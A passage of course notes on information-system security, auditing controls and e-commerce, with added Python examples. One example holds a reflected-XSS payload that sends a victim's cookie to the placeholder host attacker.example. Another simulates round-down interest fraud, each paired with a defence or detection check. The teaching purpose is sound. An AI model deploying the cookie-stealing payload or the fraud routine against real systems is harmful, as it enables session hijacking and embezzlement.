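The bug described above, shown as an added example that is not code from these notes: a search page that reflects the user's query into its HTML. The first renderer echoes the parameter unchanged, the second applies HTML output encoding, and a Content-Security-Policy header is shown as a second layer. The page template, the "q" parameter and the attacker host name attacker.example are assumptions.

```python
"""Reflected XSS: vulnerable renderer beside its hardened form.

Added example, not code from the original notes. The page template,
the "q" search parameter and the attacker host name are assumptions.
"""
import html
from urllib.parse import parse_qs, quote

# Constructed attack: the search term is a script that ships the victim's
# cookie to a host the attacker controls (attacker.example is a placeholder).
ATTACK_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
ATTACK_QUERY = "q=" + quote(ATTACK_PAYLOAD, safe="")

TEMPLATE = "<!doctype html><h1>Search</h1><p>Results for {term}</p>"


def search_term(query_string: str) -> str:
    """Pull the user-controlled 'q' parameter out of the query string."""
    return parse_qs(query_string).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Echoes the term into the HTML as-is: the classic reflected XSS bug."""
    return TEMPLATE.format(term=search_term(query_string))


def render_hardened(query_string: str) -> str:
    """Output-encodes for the HTML text context, so '<' can never start a tag.
    quote=True also encodes quotes, which matters inside attribute values."""
    return TEMPLATE.format(term=html.escape(search_term(query_string), quote=True))


def response_headers() -> dict:
    """Second layer (defense-in-depth): a Content Security Policy that keeps
    inline script from running even if an encoding mistake slips through."""
    return {"Content-Type": "text/html; charset=utf-8",
            "Content-Security-Policy": "default-src 'self'; script-src 'self'"}


def contains_script_tag(page: str) -> bool:
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()
```

The encoding has to match the output context: html.escape is right for HTML text and attribute values, but a value placed inside a JavaScript string or a URL needs that context's encoding instead. A templating engine with auto-escaping turned on gives the hardened behaviour by default.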

Other Types of Hacking


• Man in the middle (MITM)
▫ Hacker is placed in between a client (user) and a host (server) to read, modify, or steal data.
• Password cracking
▫ Recovering passwords by guessing them or by attacking stored password hashes

Hacking Used for Embezzlement


• Salami technique:
▫ Taking small amounts at a time from many accounts so that no single victim notices
▫ Round-down fraud: diverting the fractions of a cent left over when interest or similar
calculations are rounded into an account the perpetrator controls
• Economic espionage
▫ Theft of information, intellectual property and trade secrets
• Cyber-extortion
▫ Threatening a person or business (by e-mail or text message) with harm unless money is paid
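An added example, not code from these notes, of the round-down variant of the salami technique and of the audit check that exposes it. The first function reproduces what a tampered interest routine posts: every account is truncated to the cent and the accumulated fractions are added to the perpetrator's line. The second recomputes interest with the approved rounding rule and compares line by line. The account numbers, balances, the 3 % rate, the 30-day period and the perpetrator's account "9001" are constructed.

```python
"""Round-down (salami) fraud: simulate the diversion, then detect it by
recomputing interest with the approved rounding rule.

Added example, not part of the original notes. Account numbers, balances,
the rate, the period and the perpetrator's account "9001" are constructed.
"""
from decimal import Decimal, ROUND_DOWN, ROUND_HALF_UP

CENT = Decimal("0.01")
ANNUAL_RATE = Decimal("0.03")
PERIOD_DAYS = 30

# Constructed account master: (account_no, balance)
ACCOUNTS = [
    ("1001", Decimal("1000.00")),
    ("1002", Decimal("2500.00")),
    ("1003", Decimal("4321.00")),
    ("1004", Decimal("750.50")),
    ("1005", Decimal("12000.00")),
    ("9001", Decimal("100.00")),   # the perpetrator's own account
]


def raw_interest(balance: Decimal) -> Decimal:
    """Interest to full precision, before any rounding."""
    return balance * ANNUAL_RATE * PERIOD_DAYS / Decimal(365)


def approved_interest(balance: Decimal) -> Decimal:
    """The approved rule: round half up to the cent."""
    return raw_interest(balance).quantize(CENT, rounding=ROUND_HALF_UP)


def salami_postings(accounts, perp="9001") -> dict:
    """What the tampered program posts: every account is truncated to the
    cent and the accumulated fractions are added to the perpetrator's line."""
    posted = {}
    residue = Decimal(0)
    for acct, bal in accounts:
        raw = raw_interest(bal)
        truncated = raw.quantize(CENT, rounding=ROUND_DOWN)
        residue += raw - truncated
        posted[acct] = truncated
    posted[perp] += residue.quantize(CENT, rounding=ROUND_DOWN)
    return posted


def detect_round_down(accounts, posted: dict) -> dict:
    """Audit check: recompute with the approved rule and compare line by line.
    Many one-cent shortfalls plus one account posted above its recomputed
    interest is the signature of round-down fraud."""
    shortfalls, excesses = {}, {}
    for acct, bal in accounts:
        diff = posted[acct] - approved_interest(bal)
        if diff < 0:
            shortfalls[acct] = -diff
        elif diff > 0:
            excesses[acct] = diff
    beneficiary = max(excesses, key=excesses.get) if excesses else None
    return {
        "shortfall_accounts": sorted(shortfalls),
        "beneficiary": beneficiary,
        "excess": excesses.get(beneficiary, Decimal(0)),
        "total_posted": sum(posted.values()),
        "total_approved": sum(approved_interest(b) for _, b in accounts),
    }
```

In this constructed batch the grand total posted equals the grand total under the approved rule, so a financial control total on the interest run would not reveal anything; only the line-by-line recomputation does. That is why audit software recomputes from source data rather than trusting batch totals alone.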

Hacking Used for Fraud


• Internet misinformation
• E-mail threats

Social Engineering Techniques


• Identity theft
▫ Assuming someone else’s identity
• Pretexting
▫ Using an invented scenario to trick victims into divulging information
• Posing
▫ Creating a fake business to get sensitive information
• Phishing
▫ Sending an e-mail asking the victim to respond to a link that appears legitimate that requests
sensitive data
• Shoulder surfing
▫ Looking over a person’s shoulder, or using technology (e.g., a camera) to snoop, in order to
obtain confidential information
• Skimming
▫ Double-swiping a credit card to capture the data on its magnetic stripe

Why People Fall Victim


• Compassion
▫ Desire to help others
• Greed
▫ Want a good deal or something for free
• Sex appeal
▫ More cooperative with those that are flirtatious or good looking
• Sloth
▫ Lazy habits
• Trust
▫ Will cooperate if trust is gained
• Urgency
▫ Cooperation occurs when there is a sense of immediate need

Minimize the Threat of Social Engineering

• Never let people follow you into restricted areas
• Never log in for someone else on a computer
• Never give sensitive information over the phone or through e-mail
• Never share passwords or user IDs
• Be cautious of someone you don’t know who is trying to gain access through you

Types of Malware
• Spyware
▫ Secretly monitors and collects information
• Key logger
▫ Software that records user key strokes
• Trap door
▫ Set of instructions that allow the user to bypass normal system controls
• Packet sniffer
▫ Captures data as it travels over the Internet
• Trojan Horse
▫ Malicious computer instructions in an authorized and properly functioning program
• Virus
▫ A section of self-replicating code that attaches to a program or file requiring a human to do
something so it can replicate itself
• Worm
▫ Stand alone self replicating program

Cellphone Bluetooth Vulnerabilities


• Bluesnarfing
▫ Stealing contact lists, data, and pictures on Bluetooth-compatible smartphones
• Bluebugging
▫ Taking control of a phone to make or listen to calls, send or read text messages

Trust Services Framework


• Security
▫ Access to the system and data is controlled and restricted to legitimate users.
• Confidentiality
▫ Sensitive organizational data is protected.
• Privacy
▫ Personal information about trading partners, investors, and employees are protected.
• Processing integrity
▫ Data are processed accurately, completely, in a timely manner, and only with proper
authorization.
• Availability
▫ System and information are available.
Security Life Cycle
Security is a management issue
1. Assess threats and select risk response
2. Develop and communicate policies
3. Acquire and implement solutions
4. Monitor performance

Security Approaches
• Defense-in-depth
▫ Multiple layers of control (preventive and detective) to avoid a single point of failure
• Time-based model, security is effective if:
▫ P > D + C where
P is time it takes an attacker to break through preventive controls
D is time it takes to detect an attack is in progress
C is time it takes to respond to the attack and take corrective action

How to Mitigate Risk of Attack


Preventive Controls
• People
• Process
• IT Solutions
• Physical security
• Change controls and change management

Detective Controls
• Log analysis
• Intrusion detection systems
• Penetration testing
• Continuous monitoring
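An added example, not code from these notes, of log analysis as a detective control, which the list above and the earlier "Monitor system activities (user and error logs, intrusion detection)" item both call for. Two rules run over a constructed log: repeated failed logins within a short window (password guessing), a success right after such a burst, and a sensitive master-file change outside business hours. The log format, host and user names, addresses, thresholds and business hours are assumptions.

```python
"""Log analysis as a detective control: rules run over constructed
authentication and application log lines.

Added example, not from the original notes. The log format, host and user
names, addresses, thresholds and business hours are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not real data), one record per line, in time order.
SAMPLE_LOG = """\
2014-02-22 09:00:55 host=ap01 user=jsmith src=10.1.4.23 event=LOGIN_FAIL
2014-02-22 09:01:12 host=ap01 user=jsmith src=10.1.4.23 event=LOGIN_OK
2014-02-22 09:30:00 host=ap01 user=jsmith src=10.1.4.23 event=POST_JOURNAL
2014-02-22 23:14:05 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_FAIL
2014-02-22 23:14:20 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_FAIL
2014-02-22 23:14:41 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_FAIL
2014-02-22 23:15:02 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_FAIL
2014-02-22 23:15:30 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_FAIL
2014-02-22 23:15:50 host=ap01 user=ahmed src=198.51.100.7 event=LOGIN_OK
2014-02-22 23:17:10 host=ap01 user=ahmed src=198.51.100.7 event=VENDOR_MASTER_CHANGE
""".splitlines()

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=(?P<user>\S+) src=(?P<src>\S+) event=(?P<event>\S+)$"
)

FAIL_THRESHOLD = 5                 # failures ...
FAIL_WINDOW = timedelta(minutes=5) # ... within this window
SENSITIVE_EVENTS = {"VENDOR_MASTER_CHANGE", "POST_JOURNAL"}
BUSINESS_HOURS = range(7, 20)      # 07:00 to 19:59 (assumed)


def parse(lines):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
            yield rec


def analyze(lines) -> list:
    """Return alerts as dicts with rule, user, src and timestamp."""
    alerts = []
    recent_fails = defaultdict(deque)   # user -> timestamps of recent failures
    guessed = {}                        # user -> time the threshold was crossed

    def alert(rule, rec):
        alerts.append({"rule": rule, "user": rec["user"], "src": rec["src"], "ts": rec["ts"]})

    for rec in parse(lines):
        user, ts, event = rec["user"], rec["ts"], rec["event"]
        if event == "LOGIN_FAIL":
            q = recent_fails[user]
            q.append(ts)
            while q and ts - q[0] > FAIL_WINDOW:    # slide the window
                q.popleft()
            if len(q) == FAIL_THRESHOLD:
                alert("PASSWORD_GUESSING", rec)
                guessed[user] = ts
        elif event == "LOGIN_OK":
            # A success shortly after a burst of failures suggests the guess worked.
            if user in guessed and ts - guessed[user] <= FAIL_WINDOW:
                alert("LOGIN_AFTER_FAILURES", rec)
            recent_fails[user].clear()
        if event in SENSITIVE_EVENTS and ts.hour not in BUSINESS_HOURS:
            alert("AFTER_HOURS_CHANGE", rec)
    return alerts
```

The single failed login by jsmith at 09:00:55 and the journal posting during business hours produce nothing; all three alerts concern ahmed's session from 198.51.100.7. In production the thresholds would be tuned per system and the alerts routed to the incident response team rather than collected in a list.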

Corrective
• Computer Incident Response Team (CIRT)
• Chief Information Security Officer (CISO)

Preventive: People
• Culture of security
▫ Tone set at the top with management
• Training
▫ Follow safe computing practices
Never open unsolicited e-mail attachments
Use only approved software
Do not share passwords
Physically protect laptops/cellphones
▫ Protect against social engineering

Preventive: Process
• Authentication—verifies the person
1. Something the person knows (e.g., password, PIN)
2. Something the person has (e.g., token, smart card)
3. Some biometric characteristic (e.g., fingerprint)
4. A combination of two or more of the above (multifactor authentication)
• Authorization—determines what a person can access
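An added example, not code from these notes, of multifactor authentication combining factor 1 and factor 2 above: a password verified against a salted PBKDF2 hash, plus a time-based one-time code from a token or phone app (RFC 6238 TOTP). The user-record layout, the enrolment data and the iteration count are assumptions; the TOTP routine is checked against the test secret and vectors published in RFC 6238.

```python
"""Multifactor authentication: a password (something you know) verified
against a salted PBKDF2 hash, plus a TOTP code (something you have).

Added example, not from the original notes. The user record layout and
the enrolment data are assumptions; the TOTP algorithm follows RFC 6238.
"""
import hashlib
import hmac
import os
import struct

PBKDF2_ITERATIONS = 200_000   # raise for production hardware
TOTP_STEP = 30                # seconds per code
TOTP_DIGITS = 6
RFC6238_TEST_SECRET = b"12345678901234567890"   # the RFC's published test secret


def hash_password(password: str, salt: bytes = None) -> tuple:
    """Return (salt, iterations, digest) for storage. The password itself is never stored."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt, PBKDF2_ITERATIONS, digest


def verify_password(password: str, salt: bytes, iterations: int, digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


def totp(secret: bytes, unix_time: int) -> str:
    """RFC 6238 one-time password (HMAC-SHA1, 30 s step, 6 digits)."""
    counter = struct.pack(">Q", unix_time // TOTP_STEP)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                               # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** TOTP_DIGITS).zfill(TOTP_DIGITS)


def verify_totp(secret: bytes, code: str, unix_time: int, skew: int = 1) -> bool:
    """Accept the current code and one step either side to absorb clock drift."""
    return any(hmac.compare_digest(totp(secret, unix_time + d * TOTP_STEP), code)
               for d in range(-skew, skew + 1))


def enroll(username: str, password: str, totp_secret: bytes) -> dict:
    salt, iterations, digest = hash_password(password)
    return {"user": username, "salt": salt, "iterations": iterations,
            "hash": digest, "totp_secret": totp_secret}


def authenticate(records: dict, username: str, password: str, code: str, now: int) -> bool:
    """Both factors must pass. A password check is run even for an unknown
    user so that response time does not reveal which usernames exist."""
    rec = records.get(username)
    if rec is None:
        verify_password(password, b"\x00" * 16, PBKDF2_ITERATIONS, b"\x00" * 32)
        return False
    if not verify_password(password, rec["salt"], rec["iterations"], rec["hash"]):
        return False
    return verify_totp(rec["totp_secret"], code, now)


def run_demo() -> dict:
    """Enrol one constructed user and try the combinations that should pass and fail.
    At unix time 59 the valid codes for the RFC test secret are 755224, 287082 and 359152."""
    records = {"alice": enroll("alice", "correct horse battery staple", RFC6238_TEST_SECRET)}
    now = 59
    return {
        "good": authenticate(records, "alice", "correct horse battery staple", totp(RFC6238_TEST_SECRET, now), now),
        "drift": authenticate(records, "alice", "correct horse battery staple", "359152", now),
        "bad_code": authenticate(records, "alice", "correct horse battery staple", "000000", now),
        "bad_password": authenticate(records, "alice", "wrong password", "287082", now),
        "unknown_user": authenticate(records, "bob", "correct horse battery staple", "287082", now),
    }
```

The order of checks matters less than the fact that every path does comparable work and reveals nothing beyond pass or fail. Authorization, the next bullet, starts only after this returns True.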

Preventive: IT Solutions
• Antimalware controls
• Network access controls
• Device and software hardening controls
• Encryption
Preventive: Other
• Physical security access controls
▫ Limit entry to building
▫ Restrict access to network and data
• Change controls and change management
▫ Formal processes in place regarding changes made to hardware, software, or processes

Auditing computer based information system


Auditing
• The process of obtaining and evaluating evidence regarding assertions about economic actions
and events in order to determine how well they correspond with established criteria

Major Steps in the Auditing Process


• Audit planning
▫ Why, how, when, and who
▫ Establish scope and objectives of the audit; identify risk
• Collection of audit evidence
• Evaluation of evidence
• Communication of results

Risk-Based Framework
• Identify fraud and errors (threats) that can occur that threaten each objective
• Identify control procedures (prevent, detect, correct the threats)
• Evaluate control procedures
▫ Review to see if control exists and is in place
▫ Test controls to see if they work as intended
• Determine effect of control weaknesses
▫ Compensating controls

Information Systems Audit


• Using the risk-based framework for an information systems audit allows the auditor to review
and evaluate internal controls that protect the system to meet each of the following objectives:
▫ Protect overall system security (includes computer equipment, programs, and data)
▫ Program development and acquisition occur under management authorization
▫ Program modifications occur under management authorization
▫ Accurate and complete processing of transactions, records, files, and reports
▫ Prevent, detect, or correct inaccurate or unauthorized source data
▫ Accurate, complete, and confidential data files

1. Protect Overall System Security


Threat
• Theft of hardware
• Damage of hardware (accidental and intentional)
• Loss, theft, unauthorized access to
▫ Programs
▫ Data
• Unauthorized modification or use of programs and data files
• Unauthorized disclosure of confidential data
• Interruption of crucial business activities

Controls
• Limit physical access to computer equipment
• Use authentication and authorization controls
• Data storage and transmission controls
• Virus protection and firewalls
• File backup and recovery procedures
• Disaster recovery plan
• Preventive maintenance
• Insurance

2. Program Development and Acquisition Occur under Management Authorization


Threat
• Accidental programming errors
• Unauthorized program code
Controls
• Review software license agreements
• Management authorization for:
▫ Program development
▫ Software acquisition
• Management and user approval of programming specifications
• Testing and user acceptance of new programs
• Systems documentation

3. Program Modification Occurs under Management Authorization


Threat
• Accidental programming errors
• Unauthorized program code

Controls
• List program components to be modified
• Management authorization and approval for modifications
• User approval for modifications
• Test changes to program
• System documentation of changes
• Logical access controls
4. Accurate and Complete Processing of Transactions, Records, Files, and Reports

Threats
• Failure to detect incorrect, incomplete, or unauthorized input data
• Failure to correct errors identified from data editing procedures
• Errors in files or databases during updating
• Improper distribution of output
• Inaccuracies in reporting

Controls
• Data editing routines
• Reconciliation of batch totals
• Error correction procedures
• Understandable documentation
• Competent supervision

5. Prevent, Detect, or Correct Inaccurate or Unauthorized Source Data

Threat
• Inaccurate source data
• Unauthorized source data

Controls
• User authorization of source data input
• Batch control totals
• Log receipt, movement, and disposition of source data input
• Turnaround documents
• Check digit and key verification
• Data editing routines
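An added example, not code from these notes, of the input and processing controls named in objectives 4 and 5 above: a check digit on the customer number, data editing routines (validity, range and date checks) and reconciliation of batch control totals (record count, financial total and hash total) against the totals the user department computed from the source documents. The record layout, chart of accounts, amount limit and sample batch are assumptions; the mod-10 (Luhn) check digit is the standard algorithm.

```python
"""Input controls: check digits, data editing routines and batch control
totals, applied to a constructed batch of journal entries.

Added example, not from the original notes. The record layout, the chart
of accounts, the amount range and the sample batch are assumptions; the
mod-10 (Luhn) check digit is the standard algorithm.
"""
from dataclasses import dataclass
from datetime import date

VALID_ACCOUNTS = {"4000", "5100", "6200"}   # constructed chart of accounts
MAX_AMOUNT = 10_000.00                      # reasonableness limit (assumed)
TODAY = date(2014, 2, 22)


def luhn_check_digit(body: str) -> str:
    """Mod-10 (Luhn) check digit for a string of digits."""
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:           # double every second digit, starting at the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(number: str) -> bool:
    """True if the last digit is the correct check digit for the preceding ones.
    Catches any single-digit error and most adjacent transpositions."""
    return (number.isdigit() and len(number) > 1
            and luhn_check_digit(number[:-1]) == number[-1])


@dataclass
class Entry:
    customer_no: str    # last digit is a Luhn check digit
    account: str        # general ledger account code
    amount: float
    posted: date


def edit_checks(entry: Entry, today: date = TODAY) -> list:
    """Data editing routines: check digit, validity, range and date checks."""
    errors = []
    if not luhn_valid(entry.customer_no):
        errors.append("customer number fails check digit")
    if entry.account not in VALID_ACCOUNTS:
        errors.append("account not in chart of accounts")
    if not 0 < entry.amount <= MAX_AMOUNT:
        errors.append("amount outside allowed range")
    if entry.posted > today:
        errors.append("posting date in the future")
    return errors


def batch_totals(entries) -> dict:
    """Record count, financial total and hash total. The hash total (sum of
    customer numbers) has no business meaning; it only detects lost or altered records."""
    return {
        "record_count": len(entries),
        "financial_total": round(sum(e.amount for e in entries), 2),
        "hash_total": sum(int(e.customer_no) for e in entries),
    }


def validate_batch(entries, submitted_totals: dict, today: date = TODAY):
    """Run the edit checks on every entry and reconcile the batch against the
    totals the user department computed from the source documents."""
    accepted, rejected = [], []
    for e in entries:
        errs = edit_checks(e, today)
        (rejected if errs else accepted).append((e, errs))
    received = batch_totals(entries)
    mismatches = {k: (received[k], submitted_totals[k])
                  for k in received if received[k] != submitted_totals[k]}
    return accepted, rejected, mismatches


# Constructed batch. Entry 2 was keyed as 95.90 although the source document
# says 99.50, so the financial total will not reconcile; entry 3 fails two
# edit checks; entry 1 is clean.
SAMPLE_BATCH = [
    Entry("1234566", "4000", 250.00, date(2014, 2, 22)),
    Entry("1234567", "4000", 95.90, date(2014, 2, 22)),       # bad check digit
    Entry("0000018", "9999", 12_500.00, date(2014, 2, 22)),   # bad account, over limit
]
SUBMITTED_TOTALS = {"record_count": 3, "financial_total": 12_849.50,
                    "hash_total": 1234566 + 1234567 + 18}
```

The two control types are complementary: the edit checks reject individual bad records, while the keying error in entry 2 passes every edit check and is caught only because the batch financial total does not reconcile with the figure submitted on the batch control sheet.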

6. Accurate, Complete, and Confidential Data Files

Threats
• Destruction of stored data from
▫ Errors
▫ Hardware and software malfunctions
▫ Sabotage
• Unauthorized modification or disclosure of stored data

Controls
• Secure storage of data and restrict physical access
• Logical access controls
• Write-protection and proper file labels
• Concurrent update controls
• Data encryption
• Virus protection
• Backup of data files (offsite)
• System recovery procedures

Audit Techniques Used to Test Programs


• Integrated Test Facility
▫ Uses fictitious inputs
• Snapshot Technique
▫ Master files before and after update are stored for specially marked transactions
• System Control Audit Review File (SCARF)
▫ Continuous monitoring and storing of transactions that meet pre-specifications
• Audit Hooks
▫ Notify auditors of questionable transactions
• Continuous and Intermittent Simulation
▫ Similar to SCARF for DBMS
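An added example, not code from these notes, showing four of the techniques above built into one small posting routine: an integrated test facility (a fictitious entity whose transactions are processed normally but excluded from reporting), a snapshot of the master record before and after each specially tagged transaction, a SCARF log of transactions meeting audit-selection criteria, and an audit hook that notifies the auditor immediately when a dormant account is used. Account numbers, balances, the selection rules and the ITF entity "ITF-999" are constructed.

```python
"""Embedded audit module: SCARF, audit hooks, snapshots and an integrated
test facility built into a small posting routine.

Added example, not from the original notes. Account numbers, balances,
the selection rules and the ITF entity "ITF-999" are constructed.
"""
from datetime import datetime, timedelta

LARGE_AMOUNT = 10_000
DORMANT_AFTER = timedelta(days=365)


class EmbeddedAudit:
    """Auditor-controlled module compiled into the application."""

    def __init__(self, itf_entities, hook):
        self.itf_entities = set(itf_entities)  # fictitious entities used by the ITF
        self.hook = hook                       # audit hook: called at once for red flags
        self.scarf = []                        # SCARF: transactions meeting criteria
        self.snapshots = []                    # before/after images of tagged transactions

    def select(self, txn, before):
        """SCARF selection criteria, evaluated against the pre-update record."""
        hits = []
        if abs(txn["amount"]) >= LARGE_AMOUNT:
            hits.append("large amount")
        if not 7 <= txn["time"].hour < 20:
            hits.append("after hours")
        last = before["last_activity"]
        if last is not None and txn["time"] - last > DORMANT_AFTER:
            hits.append("dormant account")
        return hits


class Ledger:
    def __init__(self, master, audit):
        self.master = master
        self.audit = audit

    def post(self, txn):
        acct = self.master[txn["account"]]
        before = dict(acct)                    # image for the snapshot technique
        hits = self.audit.select(txn, before)
        acct["balance"] += txn["amount"]
        acct["last_activity"] = txn["time"]
        if hits:
            self.audit.scarf.append((txn["id"], hits))
        if "dormant account" in hits:
            self.audit.hook(txn, hits)         # immediate notification, not just a log entry
        if txn.get("audit_tag"):
            self.audit.snapshots.append((txn["id"], before, dict(acct)))

    def financial_total(self):
        """Real balances only: ITF entities are excluded from reporting."""
        return sum(a["balance"] for n, a in self.master.items()
                   if n not in self.audit.itf_entities)


def run_demo() -> dict:
    """Post four constructed transactions and return what the audit module captured."""
    master = {
        "1010": {"balance": 5_000.0, "last_activity": datetime(2014, 2, 20, 15, 0)},
        "2050": {"balance": 120.0, "last_activity": datetime(2012, 11, 3, 9, 30)},
        "ITF-999": {"balance": 0.0, "last_activity": None},
    }
    alerts = []
    audit = EmbeddedAudit(["ITF-999"], hook=lambda txn, hits: alerts.append((txn["id"], hits)))
    ledger = Ledger(master, audit)
    for txn in [
        {"id": "t1", "account": "1010", "amount": 250.0, "time": datetime(2014, 2, 22, 10, 0)},
        {"id": "t2", "account": "1010", "amount": -15_000.0, "time": datetime(2014, 2, 22, 21, 30),
         "audit_tag": True},
        {"id": "t3", "account": "2050", "amount": 900.0, "time": datetime(2014, 2, 22, 11, 15)},
        {"id": "t4", "account": "ITF-999", "amount": 1_000.0, "time": datetime(2014, 2, 22, 12, 0)},
    ]:
        ledger.post(txn)
    return {"scarf": audit.scarf, "hook_alerts": alerts, "snapshots": audit.snapshots,
            "financial_total": ledger.financial_total()}
```

The ITF transaction t4 is processed by exactly the same code path as the real ones, which is the point of the technique, but its balance never reaches the financial total. The snapshot for t2 records the balance before and after the update, so the auditor can verify the processing logic on that one transaction without re-running the whole batch.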

Software Tools Used to Test Program Logic


• Automated flowcharting program
▫ Interprets source code and generates flowchart
• Automated decision table program
▫ Interprets source code and generates a decision table
• Scanning routines
▫ Searches program for specified items
• Mapping programs
▫ Identifies unexecuted code
• Program tracing
▫ Prints program steps with regular output to observe sequence of program execution events

Computer Audit Software


• Computer assisted audit software that can perform audit tasks on a copy of a company’s data.
Can be used to:
▫ Query data files and retrieve records based upon specified criteria
▫ Create, update, compare, download, and merge files
▫ Summarize, sort, and filter data
▫ Access data in different formats and convert to common format
▫ Select records using statistical sampling techniques
Operational Audits
• Purpose is to evaluate effectiveness, efficiency, and goal achievement. Although the basic audit
steps are the same, the specific activities of evidence collection are focused toward operations
such as:
▫ Review operating policies and documentation
▫ Confirm procedures with management and operating personnel
▫ Observe operating functions and activities
▫ Examine financial and operating plans and reports
▫ Test accuracy of operating information
▫ Test operational controls

Chapter 5
Introduction to e-commerce and e-business

E-commerce encompasses the entire online process of developing, marketing, selling, delivering,
servicing, and paying for products and services, transacted on internetworked, global marketplaces
of customers, with the support of a worldwide network of business partners.

Categories of e-Commerce
• Business-to-Consumer (B2C) – businesses develop attractive electronic marketplaces to sell
products and services to consumers.
• Business-to-Business (B2B) – involves both electronic business marketplaces and direct
market links between businesses.
• Consumer-to-Consumer (C2C) – includes auction websites and electronic personal
advertising.

Electronic Payment Processes

• Web Payment – credit card payment processes on the web.
• Electronic Funds Transfer (EFT) – money and credit transfers between banks and businesses
and their customers.
• Secure Electronic Payments –
▫ encrypting data passing between customer and merchant,
▫ encrypting data passing between customer and the company authorizing the credit card
transaction,
▫ taking sensitive information off-line.

E-Commerce Success Factors

• Selection and Value – attractive product selections, competitive prices, satisfaction
guarantees, and customer support after the sale.
• Performance and Service – fast, easy navigation, shopping, and purchasing, and prompt
shipping and delivery.
• Look and Feel – attractive web storefront, website shopping areas, multimedia product
catalog pages, and shopping features.
• Advertising and Incentives – targeted web page advertising and e-mail promotions, discounts
and special offers, including advertising at affiliate sites.
• Personal Attention – personal web pages, personalized product recommendations, Web
advertising and e-mail notices, and interactive support for all customers.
• Community Relationships – virtual communities of customers, suppliers, company
representatives, and others via newsgroups, chat rooms, and links to related sites.
• Security and Reliability – security of customer information and website transactions,
trustworthy product information, and reliable order fulfillment.

Infomediaries
• Companies that serve as intermediaries in e-business and e-commerce transactions
• Provide e-commerce marketplace software products and services to power business Web
portals for e-commerce transactions.

E-commerce enablers
• Regulation
• Infrastructure
• Nature of economy
• Level of education
